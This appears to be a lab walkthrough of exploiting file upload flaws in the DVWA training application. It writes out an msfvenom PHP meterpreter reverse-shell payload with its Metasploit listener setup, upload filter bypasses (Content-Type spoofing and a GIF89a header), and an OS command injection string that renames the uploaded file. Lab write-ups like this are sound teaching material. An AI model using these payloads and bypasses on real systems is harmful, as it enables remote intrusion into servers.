In this article we will learn about file upload vulnerability and how we can use this vulnerability to get a session.
Table of content :
Practical implementation on DVWA
file upload vulnerability is a web based vulnerability that allows attackers to upload a malicious file directly and then and execute it via a web browser. In this article we will try this vulnerability on DVWA at different security levels and will try to get a session by executing the malicious file.
Practical implementation on DVWA
We will start with the low security level.open DVWA and then go to DVWA Security then select it as Low, then go to the file upload tab.
As we can see in the image that it is asking us to upload a file . So let's create our malicious file by using msfvenom.
command used : msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.9 lport=4444 -o /root/Desktop/haclabs.php
-p means payload to use
lhost is the listener address
lport is the listener port
-o is used to specify the path to save the file
Now choose the file and click on upload button.
we have uploaded the file successfully and ../ ../hackable/uploads/haclabs.php
is the path where the file is uploaded. We will use this path to execute our script.
But before that open metasploit and setup everything to get a session.
command used :
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.9
set lport 4444
please change lhost and lport according to the ip address and port number you have provided while creating the mailicious php file.
now its time to execute the uploaded file .
copy and paste the path ../ ../hackable/uploads/haclabs.php in the URL and press enter.
We have a session and this is what we want.
Now change the security level to medium and by we will use the same php file to uplaod and to get the session.
Ok so after changing to medium level go to File upload tab and try to upload the same php file .
This time we failed to upload the file. we only accept JPEG or PNG images.
No problem , open burpsuite and intercept the request when we click on upload button.
Now change Content-Type : application/x-php to Content-Type : image/jpeg and click on Forward and then we can see file is uploaded.
after uploading the file we followed the same steps to get a session .
Now change security level to High and this time also we will try to upload the same file and we can see an error is displayed.
Now we tried the same method like medium level security but we get the same error . ok so no problem ,open haclabs.php and add GIF89a; in the starting of the file and save the file as haclabs.jpg
Now we will upload the file as haclabs.jpg.
Done we have uploaded the file successfully now its time to execute our file . but wait it's a jpg file and can't be executed . So after thinking a lot we found a solution that what if we use OS Command injection to rename the file as haclabs.php . To rename the file easily we change the security to low level and switch to the OS command injection tab and we use the command : 127.0.0.1;cd ..;cd ..;cd hackable;cd uploads;mv haclabs.jpg haclabs.php to rename the file.
now the file is renamed successfully and we execute it to get a session. we executed this file by using the same method as we have done in low and medium level security.
Done! we have a session now.
So this is how we use this vulnerability to get a session.we can think of more ways to bypass medium level and high level security . So if you know any other method then mail us the walkthrough at firstname.lastname@example.org